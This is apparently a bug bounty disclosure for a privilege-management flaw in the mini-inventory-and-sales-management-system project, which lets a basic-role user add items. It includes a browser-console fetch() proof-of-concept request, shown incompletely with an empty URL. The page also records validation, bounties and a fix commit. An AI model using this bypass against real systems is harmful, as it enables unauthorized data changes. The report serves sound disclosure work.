Improper Privilege Management in amirsanni/mini-inventory-and-sales-management-system


Reported on

Jul 31st 2021


unprivileged user can add item


1. From admin account goto and add new user callled user-B with basic role .
So, user-B cant add new item.
2. Now goto user-B account and here user-B cant see any item.
Now user-B execute bellow javascript code in browser console and it will add new item

await fetch("", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Accept": "*/*",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    "referrer": "",
    "body": "itemName=jijk&itemQuantity=1&itemPrice=20&itemDescription=hghhj&itemCode=hjgj",
    "method": "POST",
    "mode": "cors"


user with Basic role can add item


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago
Amir validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 2 years ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation